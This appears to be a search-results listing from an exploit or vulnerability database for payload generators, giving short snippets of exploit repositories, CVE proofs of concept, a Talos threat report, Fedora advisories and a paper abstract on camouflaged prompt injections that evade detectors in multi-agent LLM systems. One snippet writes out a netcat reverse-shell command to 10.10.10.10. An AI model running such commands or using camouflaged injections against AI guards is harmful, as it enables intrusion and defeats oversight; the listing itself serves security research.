39 matches found
ParamStriker
ParamStriker Offline JSON & Query Parameter Exploit Frame...
Exploit-Framework
Exploit Framework !License: MIThttps://img.shields.io/bad...
Blind Spots in the Guard: How Domain-Camouflaged Injection Attacks Evade Detection in Multi-Agent LLM Systems
Injection detectors deployed to protect LLM agents are calibrated on static, template-based payloads that announce themselves as override directives. We identify a systematic blind spot: when payloads are generated to mimic the domain vocabulary and authority structures of the target document, wh...
XSS-Payload-Generator
XSS-Payload-Generator user guide 0. This script is an XSS payl...
Exploit for CVE-2024-28397
CVE-2024-28397 - Js2Py Sandbox Escape Payload Generator This...
Js2Py 0.74 - RCE
Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...
WordPress WPvivid 0.9.123 Payload Generator / Scanner
This Python script is a proof of concept tool designed to generate a crafted payload targeting the WPvivid Backup Migration plugin mechanism in WordPress. The script encrypts a JSON object containing file data using AES-CBC with a null key and IV, formats it according to the plugin's expected...
Exploit for CVE-2024-28397
CVE-2024-28397: Js2Py Sandbox Escape Payload Generator !Pyth...
nullsec-exploit
💀 NullSec Exploit Advanced Exploit Development & Payload...
JustTryHarder
This is a cheat sheet repository for the PWK Pentester's Workbench course and the OSCP Offensive Security Certified Professional exam. It is inspired by PayloadAllTheThings. The repository contains various tools, scripts, and resources for penetration testing and exploitation. The repository...
Exploit for CVE-2012-0053
This repository is an offensive tool for web application exploitation, specifically for cross-site scripting XSS attacks. It contains a collection of payloads and scripts that can be used to exploit vulnerabilities in web applications. The payloads are designed to be injected into a vulnerable we...
WAF-XSS-Evasion
WAF Evasion for XSS - Python Script 🔹 About This project e...
shelling
This repository is an offensive tool for OS command injection. It is a comprehensive OS command injection payload generator, suitable for detecting OS command injection vulnerabilities. The tool, named SHELLING, provides a customizable payload generator with various features, including support fo...
Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads
Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called "MacroPack." MacroPack is a framework designated for Red Team exercises, but w...
Exploit for Improper Input Validation in Moodle
CVE-2022-35649 Payload Generator using Python 2 and Det...
Exploit for OS Command Injection in Exiftool_Project Exiftool
CVE-2022-23935 🐍 Python Exploit for CVE-2022-23935 Staged Rev...
Exploit for Improper Restriction of XML External Entity Reference in Wordpress
CVE-2021-29447-POC About This script automates the requir...
Fedora: Security Advisory for snowcrash (FEDORA-2022-fae3ecee19)
The remote host is missing an update for the Copyright C 2022 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...
[SECURITY] Fedora 36 Update: snowcrash-0-0.7.20201119git49b99ad.fc36
A polyglot payload generator...
[SECURITY] Fedora 35 Update: snowcrash-0-0.6.20201119git49b99ad.fc35
A polyglot payload generator...